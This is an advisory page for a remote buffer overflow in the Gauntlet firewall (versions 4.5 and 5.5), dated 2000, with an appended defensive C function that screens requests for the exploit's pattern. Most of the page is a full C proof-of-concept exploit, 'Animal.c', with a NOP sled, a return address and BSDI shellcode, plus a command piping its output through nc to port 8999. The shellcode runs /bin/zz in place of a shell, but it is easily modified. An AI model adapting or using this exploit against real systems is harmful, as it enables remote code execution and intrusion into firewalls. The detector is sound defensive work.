A remote overflow vulnerability in Gauntlet

Published: 2000-05-12
Updated: 2000-05-12
Severity: High
Threat level: Other
Error type: Design error
Exploitation mode: Server mode

Affected systems

Gauntlet firewall 4.5; 5.5

Detailed description

The following is remote overflow code for the Gauntlet firewall; for how the vulnerability works, see the earlier vulnerability entry. The author modified the code below so that it runs /bin/zz in place of /bin/sh, taking the view that people should have to modify the code themselves rather than simply use it. To test, place a program named zz in the /bin directory; any program will do.

Test code

/*
 * Animal.c
 *
 *
 * Remote Gauntlet BSDI proof of concept exploit.
 * Garrison technologies may have found it, but I am the
 * one who released it. ;) I do not have a Sparc or I would
 * write up the Solaris one too. If you have one, please
 * make the changes needed and post it. Thanks.
 *
 * Script kiddies can go away, this will only execute a file
 * named /bin/zz on the remote firewall. To test this code,
 * make a file named /bin/zz and chmod it to 700.
 * I suggest for the test you just have the zz file make a note
 * in syslog or whatever makes you happy.
 *
 * This code is intended for proof of concept only.
 *
 *
 * _Gramble_
 * Hey BuBBles
 *
 * To use:
 * # Animal | nc <address> 8999
 */
#include <stdio.h>
#include <string.h>   /* strlen() */

char data[364];

main()
{
    int i;
    char shelloutput[80];

    /* just borrowed this execute code from another exploit */
    unsigned char shell[] =
        "\x90"
        "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76"
        "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07"
        "\xff\xe8\xdc\xff\xff\xff/bin/zz\x00";

    for (i = 0; i < 264; i++)
        data[i] = 0x90;
    data[i] = 0x30; i++;
    data[i] = 0x9b; i++;
    data[i] = 0xbf; i++;
    data[i] = 0xef; i++;
    data[i] = 0x00;

    for (i = 0; i < strlen(shell); i++)
        shelloutput[i] = shell[i];
    shelloutput[i] = 0x00;

    printf("10003.http://%s%s", data, shelloutput);
}

Solution

None yet
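
A defender-side screen for requests shaped like the proof of concept's output (the `10003.http://` prefix followed by a long run of 0x90 bytes), added here as an example; it is not part of the original advisory or of Gauntlet. The function names, the 200-byte URL limit and the 16-byte sled threshold are assumptions chosen for illustration, and the sample requests are constructed.

```c
/* Added example (not from the advisory): screen request payloads seen on port 8999. */
#include <stdio.h>
#include <string.h>

#define PREFIX      "10003.http://" /* request prefix printed by the PoC */
#define MAX_URL_LEN 200             /* assumed policy limit, not a vendor value */
#define SLED_RUN    16              /* assumed: 16 consecutive 0x90 bytes = sled */

enum verdict { V_OK, V_NOT_URL_REQ, V_TOO_LONG, V_NOP_SLED, V_BINARY };

/* Inspect one captured payload; len is explicit, the payload is not a C string. */
enum verdict inspect_request(const unsigned char *buf, size_t len)
{
    size_t plen = strlen(PREFIX), i, run = 0;
    int binary = 0;

    if (len < plen || memcmp(buf, PREFIX, plen) != 0)
        return V_NOT_URL_REQ;
    for (i = plen; i < len; i++) {
        unsigned char c = buf[i];
        run = (c == 0x90) ? run + 1 : 0;
        if (run >= SLED_RUN)
            return V_NOP_SLED;       /* padding pattern used by the PoC */
        if ((c < 0x20 || c > 0x7e) && c != '\r' && c != '\n')
            binary = 1;              /* a URL should be printable ASCII */
    }
    if (binary)
        return V_BINARY;
    return (len - plen > MAX_URL_LEN) ? V_TOO_LONG : V_OK;
}

/* Constructed sample: PREFIX followed by n copies of one byte (n capped at 512). */
enum verdict inspect_filled(unsigned char fill, size_t n)
{
    unsigned char buf[sizeof PREFIX + 512];
    size_t plen = strlen(PREFIX);

    if (n > 512) n = 512;
    memcpy(buf, PREFIX, plen);
    memset(buf + plen, fill, n);
    return inspect_request(buf, plen + n);
}

int main(void)
{
    printf("plain URL  -> %d\n", inspect_filled('a', 20));    /* V_OK */
    printf("long URL   -> %d\n", inspect_filled('a', 300));   /* V_TOO_LONG */
    printf("0x90 x 264 -> %d\n", inspect_filled(0x90, 264));  /* V_NOP_SLED */
    return 0;
}
```

The length check alone would reject the proof of concept's request; the sled and binary checks give the log entry a more specific reason.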